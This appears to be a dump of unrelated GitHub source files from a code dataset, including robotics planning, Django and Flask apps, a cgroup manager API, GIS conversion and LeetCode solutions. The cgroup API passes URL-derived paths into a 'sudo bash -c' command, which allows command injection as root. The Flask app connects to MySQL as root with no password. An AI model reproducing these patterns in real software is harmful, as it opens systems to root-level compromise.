print('P_purity_col_norm: ', P_purity_col_norm)\n # print('P_purity_row_norm: ', P_purity_row_norm)\n # print('P_purity_num: ', P_purity_num)\n\n action_prob = {'Push': 0, 'Mate': 0}\n P_push = np.zeros((cluster_center_num, cluster_center_num))\n P_mate = np.zeros((cluster_center_num, cluster_center_num))\n\n for i in range(P.shape[0]):\n for j in range(P.shape[1]):\n P_entry = 0\n\n P_entry_push = 0\n P_entry_mate = 0\n for m in range(P_purity_row_norm.shape[1]):\n for n in range(P_purity_row_norm.shape[1]):\n P_entry += P_purity_row_norm[i, m] * A[m, n] * P_purity_col_norm[j, n]\n\n P_entry_push += P_purity_row_norm[i, m] * A_push[m, n] * P_purity_col_norm[j, n]\n P_entry_mate += P_purity_row_norm[i, m] * A_mate[m, n] * P_purity_col_norm[j, n]\n\n P[i, j] = P_entry\n\n P_push[i, j] = P_entry_push\n P_mate[i, j] = P_entry_mate\n\n P_succesor = init_cluster_prob @ P\n\n P_succesor_mate = init_cluster_prob @ P_mate\n P_succesor_push = init_cluster_prob @ P_push\n\n # print('P: ', P)\n # print('#'*25)\n # print('P_mate: ', P_mate)\n # print('P_push: ', P_push)\n # print('P_self: ', P_self)\n\n # print('init_cluster_prob: ', init_cluster_prob)\n # print('P_succesor: ', P_succesor)\n # print('P_succesor_mate: ', P_succesor_mate)\n # print('P_succesor_push: ', P_succesor_push)\n # print('P_succesor_self: ', P_succesor_self)\n\n # print('P_succesor_mate: ', np.sum(P_succesor_mate))\n # print('P_succesor_push: ', np.sum(P_succesor_push))\n # print('P_succesor_self: ', np.sum(P_succesor_self))\n\n # # print('sum: ', P_succesor_mate+P_succesor_push+P_succesor_self)\n\n # print('P_succesor: ', np.sum(P_succesor))\n # print('#' * 50)\n # exit()\n\n return {'Push': P_succesor_push, 'Mate': P_succesor_mate}\n\n\nif __name__ == '__main__':\n end_state_distribution = find_end_state_distribution()\n plan = plan_test(end_state_distribution=None)\n print('plan: ', plan)","repo_name":"mingchen-sjtu/NeuralSymbol_AI","sub_path":"src/fmauch_universal_robot/ur_real_robot/VAE_detect/plan.py","file_name":"plan.py","file_ext":"py","file_size_in_byte":16758,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"10592973902","text":"from django.db import models\n\nclass ArmyShop(models.Model):\n year = 
models.IntegerField()\n month = models.IntegerField()\n type = models.TextField()\n name = models.TextField()\n\n class Meta:\n db_table = 'army_shop'\n managed = False\n\n# 1. 클래스\n# 2. 모델 상속\n# 3. 속성 => 변수 = OOOField 대입\nclass Course(models.Model):\n # Integer BigInteger\n name = models.CharField(max_length=30)\n cnt = models.IntegerField()","repo_name":"ggoreb/tutorial_aivle","sub_path":"secondapp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27714783452","text":"#A shop will give discount of 10% if the cost of purchased quantity is more than 1000.\n#Ask user for quantity\n#Suppose, one unit will cost 100.\n#Judge and print total cost for user.\n\nq= int(input(\"ENTER QUANTITY\"))\ndis=0\ntotalcost=0\nif(q*100>1000) :\n dis=.10*q*100\n totalcost= q*100 - dis\nelse:\n totalcost = q*100\nprint(\"TOTAL COST IS =\",totalcost) ","repo_name":"axaxthu/CODING-HOME-PRACTICE","sub_path":"shop.py","file_name":"shop.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69951072807","text":"import os\nfrom subprocess import CalledProcessError, check_call\nfrom urllib.parse import unquote\n\nfrom cgroup_manager.cgroups.serializers import CgroupCreateSerializer, CgroupProcessAddSerializer\nfrom rest_framework.exceptions import NotFound, ValidationError\nfrom rest_framework.generics import GenericAPIView\nfrom rest_framework.response import Response\nfrom rest_framework.status import HTTP_200_OK, HTTP_201_CREATED\n\ncgroup_path_prefix = \"/sys/fs/cgroup/\"\n\n\nclass CGroupProcessListAddAPIView(GenericAPIView):\n \"\"\"Lists tasks pids by cgroup. Raises 404 if cgroup does not exist. 'cgroup_path_fragment' should be urlencoded.\"\"\"\n\n queryset = None\n\n def get(self, request, *args, **kwargs):\n path = os.path.join(\n cgroup_path_prefix, unquote(kwargs[\"hierarchy\"]), unquote(kwargs.get(\"cgroup_path_fragment\", \"\")), \"tasks\")\n if not os.path.exists(path):\n raise NotFound()\n\n with open(path) as f:\n return Response(f.read().splitlines())\n\n def put(self, request, *args, **kwargs):\n \"\"\"Adds task to given cgroup. 'cgroup_path_fragment' should be urlencoded.\"\"\"\n serializer = self.get_serializer_class()(data=request.data)\n serializer.is_valid(raise_exception=True)\n pid = str(serializer.validated_data[\"pid\"]) # otherwise check_call fails\n path = os.path.join(\n cgroup_path_prefix, unquote(kwargs[\"hierarchy\"]), unquote(kwargs.get(\"cgroup_path_fragment\", \"\")), \"tasks\")\n try:\n check_call([\"sudo\", \"bash\", \"-c\", f\"echo {pid} >> {path}\"])\n except CalledProcessError:\n # on purpose. The error should not show command used as this might be a security risk\n raise ValidationError(\n detail={\"errors\": [\"Adding process to cgroup failed. 
Please check hierarchy and cgroup name.\"]})\n\n return Response(serializer.data, status=HTTP_200_OK)\n\n def get_serializer_class(self):\n # otherwise swagger complains\n if self.request.method == \"PUT\":\n return CgroupProcessAddSerializer\n\n\nclass CgroupCreateAPIView(GenericAPIView):\n \"\"\"Create cgroup in given hierarchy\"\"\"\n\n queryset = None\n serializer_class = CgroupCreateSerializer\n\n def post(self, request, *args, **kwargs):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n hierarchy = unquote(kwargs[\"hierarchy\"])\n cgroup_path_fragment = unquote(serializer.validated_data['cgroup_path_fragment'])\n path = os.path.join(cgroup_path_prefix, hierarchy, cgroup_path_fragment)\n try:\n check_call([\"sudo\", \"mkdir\", \"-p\", path])\n except CalledProcessError:\n # on purpose. The error should not show command used as this might be a security risk\n raise ValidationError(\n detail={\"errors\": [\"Creating cgroup returned an error. Please check hierarchy and cgroup name.\"]})\n return Response(serializer.data, status=HTTP_201_CREATED)\n","repo_name":"jacoor/cgroup-manager","sub_path":"cgroup_manager/cgroups/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5426492592","text":"import geopandas\nimport os\n\n\n# shapefile转geojson: shapefile路径 geojson路径\ndef shp_to_geojson(shp_path, geoj_path):\n shp = geopandas.read_file(shp_path)\n shp.to_file(geoj_path, driver=\"GeoJSON\", encoding=\"utf-8\")\n\n\n# geojson转shapefile: geojson路径 shapefile路径\ndef geojson_to_shp(geoj_path, shp_path):\n geoj = geopandas.read_file(geoj_path)\n geoj.to_file(shp_path, driver=\"ESRI Shapefile\", encoding=\"utf-8\")\n\n\nif __name__ == \"__main__\":\n # ws = r'D:\\Work_PhD\\MISR_AHI_WS\\220210'\n # geoj = ws + '/AHI_view.json'\n # shp = ws + '/AHI_view.shp'\n # geojson_to_shp(geoj, shp)\n \n ws = r'D:\\Work_PhD\\MISR_AHI_WS\\221221'\n roi_name = '60.0_1'\n geoj = ws + '/ROIs_ex_json/' + roi_name + '.json'\n shp = ws + '/ROIs_ex_shp/' + roi_name + '_ex.shp'\n shp_to_geojson(shp, geoj)\n # # shp = ws + '/0_50_roi.shp'\n # # geojson_to_shp(geoj, shp)\n\n # ws_folder = r'D:\\Work_PhD\\MISR_AHI_WS\\220331'\n # geoj_folder = os.path.join(ws_folder, 'ROI')\n # shp_folder = os.path.join(ws_folder, 'ROI_shp')\n # if not os.path.exists(shp_folder):\n # os.makedirs(shp_folder)\n # geojs = os.listdir(geoj_folder)\n # for geoj_file in geojs:\n # roi_name = geoj_file.split('.')[0] + '.' 
+ geoj_file.split('.')[1]\n # geoj_filename = os.path.join(geoj_folder, geoj_file)\n # shp_filename = os.path.join(shp_folder, roi_name + '.shp')\n # geojson_to_shp(geoj_filename, shp_filename)","repo_name":"Bosh0113/MISR_AHI","sub_path":"test/common_utils.py","file_name":"common_utils.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5687801879","text":"import requests, time, json\nfrom ScraGet.Exceptions import ProjectNotFound, InvalidValue\nfrom threading import Thread\nfrom typing import Union\n\nheaders = {\"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36\"}\n\nclass get_cloud_data:\n def __init__(self):\n pass\n \n def updateCloud(self, ID : Union[str,int], limit : Union[str,int]= \"10\", offset : Union[str,int]=\"0\") -> None:\n \"\"\"\n Requests to Scratch API for clouddata.\n\n **Params**:\\n\n `ID` - Mandatory. Put the project ID in *str* or *int* format.\\n\n `limit` - Optional (Default=10) Specify number of logs to be returned in *str* or *int* format.\\n\n `offset` - Optional (Default=0) Specify the offset for each log item in *str* or *int* format.\n \"\"\"\n info = requests.get(f\"https://clouddata.scratch.mit.edu/logs?projectid={ID}&limit={limit}&offset={offset}\")\n self.response_object = info\n self.response_time = info.elapsed.total_seconds()\n self.status_code = info.status_code\n \n if self.status_code == 200:\n info = info.json()\n self.cloud_data = info\n\n\nclass cloud:\n def __init__(self):\n self.stop = False\n \n def scan(self, ID: Union[str,int], delay: Union[float,int] = 1.0, NewThread: bool = True) -> None:\n \"\"\"\n Scans clouddata continuously every few seconds (duration to be defined by you while making the cloud class) for any changes.\n\n **Params**:\\n\n `ID` - Mandatory. Put project ID in *str* or *int* format.\\n\n `delay` - Optional(default=1.0). Put the time delay between 2 scan updates in *float* or *int* format. Minimum: 0.1 secs.\\n\n `NewThread` - Optional(default=True). Specify *True* if you need to run in a separate thread, specify *False* if you need to run in main thread. (*bool* format).\n \"\"\"\n\n \n def inner_dec(func):\n y = requests.get(f\"https://clouddata.scratch.mit.edu/logs?projectid={ID}&limit=10000&offset=0\", headers=headers)\n \n if y.status_code == 200:\n y = y.json()\n y = [json.dumps(item) for item in y]\n while True:\n time.sleep(delay)\n if self.stop:\n if NewThread:\n exit(0)\n break\n x = requests.get(f\"https://clouddata.scratch.mit.edu/logs?projectid={ID}&limit=10000&offset=0\", headers=headers)\n if x.status_code != 200: #can get 504\n continue\n x = x.json()\n\n x = [json.dumps(item) for item in x]\n if x != y:\n z = list(set(x) - set(y))\n z = [json.loads(item) for item in z]\n y = x\n self.change_log = z\n self.recent = z[0]\n self.user = z[0][\"user\"]\n self.type = z[0][\"verb\"]\n self.var = z[0][\"name\"]\n self.value = z[0][\"value\"]\n self.time = z[0][\"timestamp\"]\n func(self)\n\n else:\n raise ProjectNotFound(f\"Project with ID {ID} returned a status codes of: {y.status_code}\")\n\n def threaded_dec(func):\n scan_thread = Thread(target=inner_dec, args=(func,))\n scan_thread.setDaemon(True)\n scan_thread.start()\n self.thread = scan_thread\n\n if delay < 0.2:\n raise InvalidValue(\"Delay is less than 0.2. 
Try making the delay more than 0.2\")\n else:\n if NewThread:\n return threaded_dec\n return inner_dec\n","repo_name":"Quantum-Codes/ScraGet","sub_path":"ScraGet/cloud.py","file_name":"cloud.py","file_ext":"py","file_size_in_byte":3372,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"73816174568","text":"n=int(input())\nif(n==1):\n print(n)\nelse:\n count=0\n for i in range(1, (n//2)+1):\n for j in range(i, n+1):\n if(i*j<=n):\n count=count+1\n else:\n break\n print(count)\n","repo_name":"RajathRD/competitive-coding","sub_path":"SPOJ/AE00.py","file_name":"AE00.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13920928861","text":"import logging\nfrom typing import Optional\n\nlogger_initialized = {}\n\n\ndef get_logger(name: str,\n log_file: Optional[str] = None,\n log_level: int = logging.INFO,\n file_mode: str = 'w'):\n \"\"\"Initialize and get a logger by name.\n\n If the logger has not been initialized, this method will initialize the\n logger by adding one or two handlers, otherwise the initialized logger will\n be directly returned. During initialization, a StreamHandler will always be\n added. If `log_file` is specified, a FileHandler will also be added.\n Args:\n name (str): Logger name.\n log_file (str | None): The log filename. If specified, a FileHandler\n will be added to the logger.\n log_level (int): The logger level.\n file_mode (str): The file mode used in opening log file.\n Defaults to 'w'.\n Returns:\n logging.Logger: The expected logger.\n \"\"\"\n # use logger in mmengine if exist.\n try:\n from mmengine.logging import MMLogger\n if MMLogger.check_instance_created(name):\n logger = MMLogger.get_instance(name)\n else:\n logger = MMLogger.get_instance(\n name,\n log_file=log_file,\n log_level=log_level,\n file_mode=file_mode)\n return logger\n\n except Exception:\n pass\n\n logger = logging.getLogger(name)\n if name in logger_initialized:\n return logger\n # handle hierarchical names\n # e.g., logger \"a\" is initialized, then logger \"a.b\" will skip the\n # initialization since it is a child of \"a\".\n for logger_name in logger_initialized:\n if name.startswith(logger_name):\n return logger\n\n # handle duplicate logs to the console\n for handler in logger.root.handlers:\n if type(handler) is logging.StreamHandler:\n handler.setLevel(logging.ERROR)\n\n stream_handler = logging.StreamHandler()\n handlers = [stream_handler]\n\n if log_file is not None:\n # Here, the default behaviour of the official logger is 'a'. 
Thus, we\n # provide an interface to change the file mode to the default\n # behaviour.\n file_handler = logging.FileHandler(log_file, file_mode)\n handlers.append(file_handler)\n\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n for handler in handlers:\n handler.setFormatter(formatter)\n handler.setLevel(log_level)\n logger.addHandler(handler)\n\n logger.setLevel(log_level)\n logger_initialized[name] = True\n\n return logger\n","repo_name":"open-mmlab/mmdeploy","sub_path":"mmdeploy/utils/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":2256,"dataset":"github-code","pt":"53"} +{"seq_id":"39813951570","text":"def caesar(s, n):\n s = list(s)\n for i in range(len(s)):\n if s[i].isupper():\n s[i]=chr((ord(s[i])-ord('A')+ n)%26+ord('A'))\n elif s[i].islower():\n s[i]=chr((ord(s[i])-ord('a')+ n)%26+ord('a'))\n\n return \"\".join(s)\n # 주어진 문장을 암호화하여 반환하세요.","repo_name":"cwadven/algorism_programmers","sub_path":"Level1/시저 암호H/clean_answer.py","file_name":"clean_answer.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18351081787","text":"from flask import Flask, jsonify, request\n\nimport mysql.connector\n\ndb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n passwd=\"\",\n database=\"banco\"\n)\n\napp = Flask(__name__)\n\n#Create\n@app.route('/api/notas', methods=['POST'])\ndef add_nota():\n cursor = db.cursor()\n title = request.json['title']\n content = request.json['content']\n cursor.execute(\"INSERT INTO notas (title, content) VALUES (%s, %s)\", (title, content))\n db.commit()\n return jsonify({'message': 'Nota adicionada com sucesso'})\n\n\n#Read\n@app.route('/api/notas', methods=['GET'])\ndef get_notas():\n cursor = db.cursor()\n cursor.execute(\"SELECT * FROM notas\")\n notas = cursor.fetchall()\n return jsonify(notas)\n\n#Update\n@app.route('/api/notas/', methods=['PUT'])\ndef update_nota(id):\n cursor = db.cursor()\n title = request.json['title']\n content = request.json['content']\n cursor.execute(\"UPDATE notas SET title=%s, content=%s WHERE id=%s\", (title, content, id))\n db.commit()\n return jsonify({'message': 'Nota atualizada com sucesso'})\n\n#Delete\n@app.route('/api/notas/', methods=['DELETE'])\ndef delete_nota(id):\n cursor = db.cursor()\n cursor.execute(\"DELETE FROM notas WHERE id=%s\", (id,))\n db.commit()\n return jsonify({'message': 'Nota deletada com sucesso'})\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"RafaelM4gn/python-backend-studies","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11598993452","text":"import inspect\nimport wradlib as wlb\nfrom .utilities import do_call, str2numeric_dict_args\n\ndef calculate_pia_dict_args(radar, pia = None,\n dbz_field = 'DBZ_F',\n kdp_field = 'KDP_F'):\n if pia is not None:\n if pia['use_pia']:\n if pia['pia_field'] in pia.keys():\n pia_args = pia[pia['pia_field']]\n pia_args = str2numeric_dict_args(pia_args)\n\n if pia['pia_field'] == 'dbz':\n args_constr = [k for k in pia_args.keys() if 'constraint' in k]\n if len(args_constr) > 0:\n args_pia = [k for k in pia_args.keys() if k not in args_constr]\n args_constr, pia_args = map(lambda keys: {x: pia_args[x] for x in keys}, [args_constr, args_pia])\n\n if 
args_constr['constraints'] == 'both':\n pia_args['constraints'] = [wlb.atten.constraint_dbz, wlb.atten.constraint_pia]\n pia_args['constraint_args'] = [[args_constr['constraint_args_dbz']], [args_constr['constraint_args_pia']]]\n elif args_constr['constraints'] == 'dbz':\n pia_args['constraints'] = [wlb.atten.constraint_dbz]\n pia_args['constraint_args'] = [[args_constr['constraint_args_dbz']]]\n elif args_constr['constraints'] == 'pia':\n pia_args['constraints'] = [wlb.atten.constraint_pia]\n pia_args['constraint_args'] = [[args_constr['constraint_args_pia']]]\n else:\n pia_args['constraints'] = None\n pia_args['constraint_args'] = None\n\n pia_args['dbz_field'] = dbz_field\n else:\n pia_args['kdp_field'] = kdp_field\n\n pia_args['pia_field'] = pia['pia_field']\n\n return calculate_pia(radar, **pia_args)\n else:\n return correct_attenuation(radar, pia_field = pia['pia_field'])\n else:\n return None\n else:\n return None\n\n# args_dbz = ['a_max', 'a_min', 'n_a', 'b_max', 'b_min', 'n_b', 'sector_thr',\n# 'constraint_args_dbz', 'constraint_args_pia']\n# num_dbz = [float, float, int, float, float, int, int, float, float]\n# for k in range(len(args_dbz)):\n# pia_args[args_dbz[k]] = num_dbz[k](pia_args[args_dbz[k]])\n\ndef calculate_pia(radar, **kwargs):\n args1 = inspect.getfullargspec(correct_attenuation).args[1:]\n args2 = inspect.getfullargspec(wlb.atten.correct_attenuation_constrained).args[1:]\n args3 = inspect.getfullargspec(wlb.atten.pia_from_kdp).args[1:]\n pia_args = args1 + args2 + args3\n\n pia_kwargs = dict((key, kwargs[key]) for key in pia_args if key in kwargs)\n pia = do_call(correct_attenuation, args = [radar], kwargs = pia_kwargs)\n\n return pia\n\ndef correct_attenuation(radar, pia_field = 'dbz', dbz_field = 'DBZ_F',\n kdp_field = 'KDP_F', **kwargs):\n # path-integrated attenuation\n # pia_field: 'dbz' or 'kdp'\n dr = radar.range['meters_between_gates']/1000\n\n if pia_field == 'dbz':\n dbz = radar.fields[dbz_field]['data']\n pia_fun = wlb.atten.correct_attenuation_constrained\n pia_args = inspect.getfullargspec(pia_fun).args[1:]\n pia_kwargs = dict((key, kwargs[key]) for key in pia_args if key in kwargs)\n if not 'gate_length' in kwargs:\n pia_kwargs['gate_length'] = dr\n pia = do_call(pia_fun, args = [dbz], kwargs = pia_kwargs)\n\n if pia_field == 'kdp':\n kdp = radar.fields[kdp_field]['data']\n pia_fun = wlb.atten.pia_from_kdp\n pia_args = inspect.getfullargspec(pia_fun).args[1:]\n pia_kwargs = dict((key, kwargs[key]) for key in pia_args if key in kwargs)\n if not 'dr' in kwargs:\n pia_kwargs['dr'] = dr\n pia = do_call(pia_fun, args = [kdp], kwargs = pia_kwargs)\n\n return pia\n","repo_name":"rijaf-iri/mtorwaradar","sub_path":"mtorwaradar/util/pia.py","file_name":"pia.py","file_ext":"py","file_size_in_byte":4037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1386976142","text":"from db_connector import engine\nfrom binance import ThreadedWebsocketManager\nfrom coinmarketcapapi import CoinMarketCapAPI\nfrom config import COINS, CRYPTO_TABLE_NAME\nfrom creds import MARKET_API_KEY, BINANCE_API_KEY, BINANCE_SECRET_KEY\nimport pandas as pd\nimport datetime\n\n\nclass MessageHandler():\n\n def __init__(self):\n self.last_hour = -1\n self.last_close = -1\n self.market_cap = self.get_market_cap()\n \n\n def handle_socket_message(self, msg):\n # Check if full minute passed\n if msg['k']['x']:\n df = pd.DataFrame([msg['k']])\n df = df.loc[:, ['t', 's', 'o', 'c', 'h', 'l', 'v', 'q']]\n df.columns = ['starttime', 
'symbol', 'open',\n 'close', 'high', 'low', 'basevolume', 'quotevolume']\n df[\"market_cap\"] = 0\n symbol = df.loc[0, \"symbol\"]\n\n # Data Preperation\n df.open = df.open.astype(float)\n df.close = df.close.astype(float)\n df.high = df.high.astype(float)\n df.low = df.low.astype(float)\n df.market_cap = df.market_cap.astype(float)\n df.starttime = pd.to_datetime(df.starttime, unit=\"ms\")\n\n print(\"#############MARKET_CAP_TABLE#############\")\n print(self.market_cap)\n # Update market cap\n if self.last_hour != datetime.datetime.now().hour:\n self.market_cap = self.get_market_cap()\n self.last_hour = datetime.datetime.now().hour\n else:\n pct_change = 1\n if self.market_cap.loc[self.market_cap[\"symbol\"] == symbol, \"last_close\"].values[0] != -1:\n pct_change = df.loc[0, \"close\"] / self.market_cap.loc[self.market_cap[\"symbol\"] == symbol, \"last_close\"].values[0]\n self.market_cap.loc[self.market_cap[\"symbol\"] == symbol, \"market_cap\"] *= pct_change\n print(pct_change)\n\n df[\"market_cap\"] = self.market_cap.loc[self.market_cap[\"symbol\"] == symbol, \"market_cap\"].values[0]\n self.market_cap.loc[self.market_cap[\"symbol\"] == symbol, \"last_close\"] = df.loc[0, \"close\"]\n\n # Write to data base\n try:\n df.to_sql(CRYPTO_TABLE_NAME, engine, if_exists='append', index=False)\n except:\n print(\"DATABASE UNAVAILABLE SKIPPING WRITE\") \n print(\"#############WRITTEN DATA#############\")\n print(df)\n\n def get_market_cap(self):\n coins = \"\"\n for coin in COINS:\n coins += coin\n coins += \",\"\n coins = coins[:-1]\n coins\n\n cmc = CoinMarketCapAPI(api_key=MARKET_API_KEY)\n r = cmc.cryptocurrency_quotes_latest(symbol=coins, convert=\"EUR\")\n df = pd.DataFrame(r.data)\n df = df.transpose()\n df = df.drop([\"id\", \"name\",\"slug\",\"num_market_pairs\",\"date_added\",\"tags\", \"max_supply\",\"circulating_supply\",\"total_supply\",\"is_active\",\"platform\",\"cmc_rank\",\"is_fiat\",\"last_updated\"], axis=1)\n df[\"market_cap\"] = df[\"quote\"].apply(lambda x: x[\"EUR\"][\"market_cap\"])\n df = df.drop(\"quote\", axis=1)\n df[\"symbol\"] = df[\"symbol\"] + \"EUR\"\n df[\"last_close\"] = -1\n\n df.market_cap = df.market_cap.astype(float)\n df.last_close = df.last_close.astype(float)\n return df\n \n\n\nclass LiveDataCollector():\n\n def __init__(self):\n self.run = True\n self.twm = ThreadedWebsocketManager(\n api_key=BINANCE_API_KEY, api_secret=BINANCE_SECRET_KEY)\n\n def start(self):\n handler = MessageHandler()\n self.twm.start()\n\n # start any sockets here\n for coin in COINS:\n symbol = f\"{coin}EUR\"\n self.twm.start_kline_socket(\n callback=handler.handle_socket_message, symbol=symbol)\n print(f\"{symbol} socket started\")\n\n def stop(self):\n self.twm.stop()\n\n\nif __name__ == \"__main__\":\n ldc = LiveDataCollector()\n ldc.start()\n","repo_name":"chris-hoertnagl/market-analytics","sub_path":"coin_data_collector.py","file_name":"coin_data_collector.py","file_ext":"py","file_size_in_byte":3994,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41904388234","text":"# https://leetcode.com/problems/intersection-of-two-arrays/\n\n\n# Given two arrays, write a function to compute their intersection.\n#\n# Example:\n# Given nums1 = [1, 2, 2, 1], nums2 = [2, 2], return [2].\n#\n# Note:\n# Each element in the result must be unique.\n# The result can be in any order.\n\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = 
None\n\n\nclass Solution(object):\n def preOrder(self, root, level, l):\n if root:\n if len(l) < level + 1:\n l.append([])\n if level % 2 == 0:\n l[level].append(root.val)\n else:\n l[level].insert(0, root.val)\n self.preOrder(root.left, level + 1, l)\n self.preOrder(root.right, level + 1, l)\n\n def zigzagLevelOrder(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n l = []\n self.preOrder(root, 0, l)\n return l\n","repo_name":"Kimice/Recoba","sub_path":"leetcode/binary-tree-zigzag-level-order-traversal.py","file_name":"binary-tree-zigzag-level-order-traversal.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33616963558","text":"# Leetcode Problem 3 \n# Oct 1 2020\ndef lengthOfLongestSubstring(s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n cur_s = \"\"\n maxl = 0\n dic = {}\n for c in s:\n if c in dic:\n ret_ind = 0\n for i in range(len(cur_s)):\n if cur_s[i] == c:\n ret_ind = i\n break\n del dic[cur_s[i]]\n del dic[c]\n cur_s = cur_s[ret_ind+1:]\n dic[c] = c\n cur_s = cur_s + c\n if len(cur_s) > maxl:\n maxl = len(cur_s)\n return maxl\n\n# print(lengthOfLongestSubstring(\"abcabcbb\")==3)\n\n","repo_name":"HuiwenHe19/Leetcode","sub_path":"prob3.py","file_name":"prob3.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8394598245","text":"import json\nimport os\nfrom createClass import People, DIR_FILE, make_dump\n\nmake_dump()\n\nwith open(DIR_FILE, 'r', encoding='utf-8') as file:\n dict_el = json.load(file)\n\n p1 = People(**dict_el)\n\nprint(\"Nome:\",p1.name)\nprint(\"Ano de nascimento:\",p1.age)\nprint(\"Email:\",p1.email)\n","repo_name":"Thiago-Teofilo/curso_python","sub_path":"python_curso_completo/m05_intro_poo/aula206_classe_json/loadClass.py","file_name":"loadClass.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10814807444","text":"class Solution(object):\n def minOperations(self, nums, x):\n sums = sum(nums)\n if x>sums:\n return -1\n if x==sums:\n return len(nums)\n \n sums = sums-x\n cur, start, ans = 0, 0, -1\n \n for end in range(len(nums)):\n if cur < sums:\n cur+=nums[end]\n \n while cur>=sums:\n if cur==sums:\n ans = max(ans, end-start+1)\n cur -= nums[start]\n start+=1\n \n return len(nums)-ans if ans!=-1 else an\n\nclass Solution(object):\n def minOperations(self, nums, x):\n arr_sum = sum(nums)\n if arr_sum < x:\n return -1\n if arr_sum == x:\n return len(nums)\n \n required_subarray_sum = arr_sum - x\n left = curr_sum = max_subarray_size = 0\n for right, num in enumerate(nums):\n curr_sum += num\n while curr_sum > required_subarray_sum:\n curr_sum -= nums[left]\n left += 1\n if curr_sum == required_subarray_sum:\n max_subarray_size = max(max_subarray_size, right - left + 1)\n \n return len(nums) - max_subarray_size if max_subarray_size > 0 else -1 ","repo_name":"Ayushmanglani/competitive_coding","sub_path":"leetcode/Jan_2021/14_MinimumOperationsToReduceXtoZero.py","file_name":"14_MinimumOperationsToReduceXtoZero.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72122434407","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\n\nfrom hatta.config import read_config\nfrom hatta.wiki import 
Wiki\n\n\n# Avoid WSGI errors, see http://mercurial.selenic.com/bts/issue1095\nsys.stdout = sys.__stdout__\nsys.stderr = sys.__stderr__\n\n\ndef application(env, start):\n \"\"\"Detect that we are being run as WSGI application.\"\"\"\n\n global application\n config = read_config()\n script_dir = os.path.dirname(os.path.abspath(__file__))\n if config.get('pages_path') is None:\n config.set('pages_path', os.path.join(script_dir, 'docs'))\n wiki = Wiki(config)\n application = wiki.application\n return application(env, start)\n\n\ndef main(config=None, wiki=None):\n \"\"\"Start a standalone WSGI server.\"\"\"\n\n config = config or read_config()\n wiki = wiki or Wiki(config)\n app = wiki.application\n\n host, port = (config.get('interface', '0.0.0.0'),\n int(config.get('port', 8080)))\n try:\n from cheroot import wsgi\n except ImportError:\n wsgi = None\n\n if wsgi is None:\n import werkzeug\n try:\n werkzeug.run_simple(host, port, app, use_reloader=False)\n except KeyboardInterrupt:\n pass\n else:\n name = wiki.site_name\n server = wsgi.Server((host, port), app,\n server_name=name)\n try:\n server.start()\n except KeyboardInterrupt:\n server.stop()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"davestgermain/hatta","sub_path":"hatta/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"17211737672","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score, confusion_matrix\n\n# Load the training and test data\ntrain_df = pd.read_csv(\"train.csv\")\ntest_df = pd.read_csv(\"test.csv\")\n\n# Initial data exploration\ntrain_df.head()\ntrain_df.info()\ntrain_df.describe()\nsns.countplot(x='Survived', data=train_df)\n\n# Data preprocessing\ntrain_df.drop(columns=['Cabin'], inplace=True)\ntest_df.drop(columns=['Cabin'], inplace=True)\ntrain_df['Age'].fillna(train_df['Age'].mean(), inplace=True)\ntrain_df['Embarked'].fillna(train_df['Embarked'].mode()[0], inplace=True)\ntest_df['Age'].fillna(test_df['Age'].mean(), 